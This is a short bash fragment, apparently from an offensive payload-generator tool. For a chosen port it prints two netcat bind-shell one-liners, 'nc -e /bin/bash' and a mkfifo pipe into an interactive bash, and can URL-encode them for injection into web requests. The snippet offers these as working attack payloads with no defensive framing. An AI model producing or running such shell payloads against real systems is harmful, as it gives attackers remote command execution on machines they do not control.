if [ $ENCODE == "True" ]
then
	
	echo -e "\033[31m\033[1mTraditional:\033[m"
	url_encode "nc -nlvp $PORT -e /bin/bash"
	echo -e "\033[31m\033[1mNetcat OpenBsd:\033[m"
	url_encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $PORT >/tmp/f"
	echo -e "\033[m"
else
	echo -e "\033[31m\033[1mTraditional:\033[m"
	echo -e "\t\033[1mnc -nlvp $PORT -e /bin/bash\033[m"
	echo -e "\033[31m\033[1mNetcat OpenBsd:\033[m"
	echo -e "\t\033[1mrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $PORT >/tmp/f\033[m"
	echo -e "\033[m"
fi
